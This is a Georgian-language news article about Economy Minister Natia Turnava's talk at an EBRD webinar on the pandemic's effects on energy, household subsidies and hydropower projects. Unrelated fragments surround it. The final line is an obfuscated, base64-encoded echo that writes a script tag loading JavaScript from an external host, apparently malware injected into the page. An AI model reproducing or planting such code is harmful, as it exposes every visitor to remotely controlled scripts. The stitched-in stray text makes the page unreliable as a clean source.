celsiusi
ავერსი შნაიდერი
ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ "ევროპის რეკონსტრუქციისა და განვითარების ბანკის" ორგანიზებულ ვებინარში მიიღო მონაწილეობა.
 
უწყების ცნობით, ვებინარი კოვიდ-19 - ის პანდემიის შედეგად გლობალური ენერგეტიკის გამოწვევებსა და სექტორის პოსტპანდემიურ განვითარებას შეეხებოდა.
 
ეკონომიკის სამინისტროს ინფორმაციით, გამოსვლაში ნათია თურნავამ საქართველოს ენერგეტიკის სექტორის წინაშე არსებულ გამოწვევებსა და მთავრობის ანტიკრიზისულ გადაწყვეტილებებზე ისაუბრა, რომლებიც მოსახლეობისა და ბიზნესის მხარდაჭერისკენაა მიმართული. მისი თქმით, პანდემიამ გლობალურის მსგავსად, საქართველოს ენერგეტიკაც სერიოზული გამოწვევების წინაშე დააყენა.
 
„ეკონომიკური ვარდნა, რაც მსოფლიოში შეინიშნება, იწვევს მთელ რიგ ნეგატიურ მოვლენებს ენერგეტიკისთვის - მოხმარებისა და გადახდისუნარიანობის შემცირებას როგორც ბიზნესში, ასევე მოსახლეობაში, ასევე პროექტების შეჩერებას. ამ თვალსაზრისით, საქართველო გამოირჩევა იმით, რომ ჩვენმა სახელისუფლებო გუნდმა ანტიკრიზისული გეგმის ერთ-ერთ ღონისძიებად დაისახა ოჯახებისთვის ენერგეტიკული დანახარჯების სუბსიდირება. ამით ჩვენ ვეხმარებით საქართველოს ოჯახების 2/3-ს, რომლებიც ელექტროენერგიისა და ბუნებრივ აირის მომხმარებლები არიან", - განაცხადა ნათია თურნავამ.
 
მინისტრის განცხადებით, აღნიშნული ღონისძიებების პარალელურად, საქართველოში არ შეჩერებულა ენერგეტიკული პროექტები, რომლებიც კერძო ინვესტიციით ხორციელდება. მისი თქმით, საუბარია როგორც პანდემიამდე, ისე 2020 წლის განმავლობაში დაწყებულ პროექტებზე. ნათია თურნავას განცხადებით, 670 მგვტ სიმძლავრის ჰიდროელექტროსადგურები ან შევიდა ექსპლუატაციაში, ან გადავიდა მშენებლობის ეტაპზე. მან ასევე გაამახვილა ყურადღება ქვეყნის უმსხვილესი ჰიდროელექტროსადგურის - "ენგურჰესის" რეაბილიტაციაზე, რომელიც უახლოესი 3 თვის განმავლობაში განხორციელდება.
 
მინისტრმა მადლობა გადაუხადა ვებინარის ორგანიზატორს, "ევროპის რეკონსტრუქციისა და განვითარების ბანკს" და აღნიშნა, რომ მსგავსი ღონისძიებები დაინტერესებულ მხარეებს აძლევს კონსტრუქციული დიალოგების ჩატარების, გამოცდილების გაზიარების და ენერგეტიკის სფეროში არსებული თანამშრომლობის კიდევ უფრო გაღრმავების შესაძლებლობას.
1502
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");